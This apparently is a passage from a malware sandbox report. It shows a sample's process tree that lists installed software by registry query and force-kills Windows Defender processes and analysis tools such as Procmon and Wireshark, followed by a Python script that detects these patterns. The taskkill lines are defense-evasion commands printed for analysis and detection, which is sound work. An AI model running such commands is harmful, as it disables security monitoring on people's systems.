        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:760
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵PID:1780
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:752
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1788
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵PID:1652
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1936
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1852
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵PID:1216
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1824
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1928
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵PID:1796
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1624
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1708
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1088
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:824
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵PID:2000
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:2044
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵PID:2008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵PID:480
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:760
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵PID:1492
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2028
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵PID:1448
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1552
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1332
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵PID:1596
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:108
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1652
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:764
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1376
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1824
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1996
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵PID:1644
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1852
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1656
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵PID:1336
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:1808
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:1572
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1084
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1804
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1960
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1900
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1948
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1920
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1840
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:1584
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:480
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1780
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1568
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1112
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1496
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1552
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1812
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:556
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1340
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1596
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1936
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:764
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1216
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:112
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1644
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1820
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:684
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:1808
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1520
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:1612
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:2020
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1116
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1916
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1524
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1584
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1908
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1136
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1552
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1368
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:108
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1596
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1216
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1112
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1376
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1664
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1100
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:660
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1696
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1608
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:536
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1972
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:240
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1928
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1008
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:1912
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1892
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:1808
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1572
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1832
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2020
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:376
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1596
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1840
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1560
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:1476
-
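Two patterns in the tree above are what a detection engineer would key on: every installed product is looked up with `reg query` under `HKLM\...\CurrentVersion\Uninstall\<product>` twice, once with `/reg:64` and once with `/reg:32`, and Windows Defender components and analysis tools are stopped with `taskkill /IM <image> /T /F`. The Python below is an added example, not part of the sandbox report and not code from the sample: it replays constructed process-creation records shaped like the entries above (tuples of pid, parent pid, image, command line) and flags both patterns per process-tree root. The parent PID 1000, the two benign records, and the threshold of three distinct Uninstall keys are assumptions made for illustration.

```python
"""Flag the two behaviours in the process tree above from process-creation records.
Added example, not code from the sandbox report or from the sample. Records are tuples
(pid, ppid, image, cmdline); parent PID 1000, the benign records and the 3-key threshold
are assumptions made for illustration."""
import re
from collections import defaultdict

# Image names copied from the taskkill lines in the tree above.
DEFENDER_IMAGES = {"msascui.exe", "msmpeng.exe", "mpuxsrv.exe", "mpcmdrun.exe",
                   "nissrv.exe", "configsecuritypolicy.exe"}
ANALYSIS_IMAGES = {"procexp.exe", "procmon.exe", "wireshark.exe", "tshark.exe",
                   "text2pcap.exe", "rawshark.exe", "dumpcap.exe", "capinfos.exe"}

# reg query of HKLM\...\Uninstall\<product> (quoted or bare) with an optional /reg:32|64 view.
UNINSTALL_RE = re.compile(
    r'reg(?:\.exe)?\s+query\s+"?(?:HKEY_LOCAL_MACHINE|HKLM)'
    r'\\software\\microsoft\\windows\\currentversion\\uninstall\\'
    r'(?:([^"]+)"|(\S+))(?:\s+/reg:(32|64))?', re.IGNORECASE)
TASKKILL_RE = re.compile(r'taskkill(?:\.exe)?"?\s+(?P<args>.*)', re.IGNORECASE)
IM_RE = re.compile(r'/IM\s+"?([^"\s]+)"?', re.IGNORECASE)
SWITCH_RE = re.compile(r'(?<!\S)(/[A-Za-z]+)(?!\S)')


def parse_taskkill(cmdline):
    """Return (image, force, tree) for a `taskkill /IM <image>` command line, else None."""
    m = TASKKILL_RE.search(cmdline)
    im = IM_RE.search(m.group("args")) if m else None
    if not im:
        return None
    switches = {s.upper() for s in SWITCH_RE.findall(m.group("args"))}
    return im.group(1).lower(), "/F" in switches, "/T" in switches


def root_of(pid, parents):
    """Walk the parent map up to the oldest ancestor we hold a record for."""
    seen = set()
    while pid in parents and pid not in seen:
        seen.add(pid)
        pid = parents[pid]
    return pid


def analyze(events, inventory_threshold=3):
    """Attribute each record to its root ancestor; return findings for roots that fire."""
    parents = {pid: ppid for pid, ppid, _, _ in events}
    per_root = defaultdict(lambda: {"inventory": defaultdict(set),
                                    "killed_defender": set(), "killed_analysis": set()})
    for pid, _, _, cmdline in events:
        r = per_root[root_of(pid, parents)]
        m = UNINSTALL_RE.search(cmdline)
        if m:  # one Uninstall key; remember which registry view was asked for
            r["inventory"][(m.group(1) or m.group(2)).strip()].add(m.group(3) or "native")
            continue
        parsed = parse_taskkill(cmdline)
        if parsed and parsed[0] in DEFENDER_IMAGES:
            r["killed_defender"].add(parsed[0])
        elif parsed and parsed[0] in ANALYSIS_IMAGES:
            r["killed_analysis"].add(parsed[0])
    findings = {}
    for root, r in per_root.items():
        verdicts = []
        if len(r["inventory"]) >= inventory_threshold:
            verdicts.append("software-inventory")
        if r["killed_defender"]:
            verdicts.append("defender-tamper")
        if r["killed_analysis"]:
            verdicts.append("analysis-tool-kill")
        if verdicts:
            findings[root] = {
                "verdicts": verdicts,
                "inventory_keys": sorted(r["inventory"]),
                # the sample asks for every key in both the 64-bit and the 32-bit view
                "both_views": all({"32", "64"} <= v for v in r["inventory"].values()),
                "killed_defender": sorted(r["killed_defender"]),
                "killed_analysis": sorted(r["killed_analysis"]),
            }
    return findings


UNINST = r'HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall'
REG, CMD, TK = r"C:\Windows\system32\reg.exe", r"C:\Windows\system32\cmd.exe", r"C:\Windows\System32\taskkill.exe"
# Constructed sample: a slice of the tree above (PIDs as in the report, parent 1000
# assumed) plus two benign records that must not fire.
SAMPLE_EVENTS = [
    (1332, 1000, CMD, "cmd.exe"),
    (744, 1332, REG, f'reg query "{UNINST}\\SchedulingAgent" /reg:64'),
    (536, 1332, REG, f'reg query "{UNINST}\\SchedulingAgent" /reg:32'),
    (1264, 1000, CMD, "cmd.exe"),
    (1912, 1264, REG, f'reg query "{UNINST}\\VLC media player" /reg:64'),
    (2040, 1264, REG, f'reg query "{UNINST}\\VLC media player" /reg:32'),
    (2024, 1000, CMD, "cmd.exe"),
    (1008, 2024, REG, f'reg query "{UNINST}\\WIC" /reg:64'),
    (1968, 2024, REG, f'reg query "{UNINST}\\WIC" /reg:32'),
    (1644, 1000, TK, f'"{TK}" /IM "MSASCui.exe" /T /F'),
    (1612, 1000, TK, f'"{TK}" /IM "MsMpEng.exe" /T /F'),
    (1572, 1000, TK, f'"{TK}" /IM "procexp.exe" /T /F'),
    (1832, 1000, TK, f'"{TK}" /IM "wireshark.exe" /T /F'),
    (3000, 3001, REG, r'reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v Domain'),
    (3002, 3003, TK, "taskkill /IM notepad.exe /F"),
]

if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

Run against the constructed records, only root PID 1000 fires, with all three verdicts, the three products seen in both registry views, `msascui.exe` and `msmpeng.exe` under `killed_defender`, and `procexp.exe` and `wireshark.exe` under `killed_analysis`; the unrelated `reg query` of a service key and the `taskkill` of notepad.exe produce nothing. Grouping by root ancestor is what lets the detector connect reg.exe children of many short-lived cmd.exe instances back to one origin; on real telemetry the `inventory_threshold` and the tool lists are the knobs to tune, and a kill against an image outside both lists is deliberately ignored rather than scored.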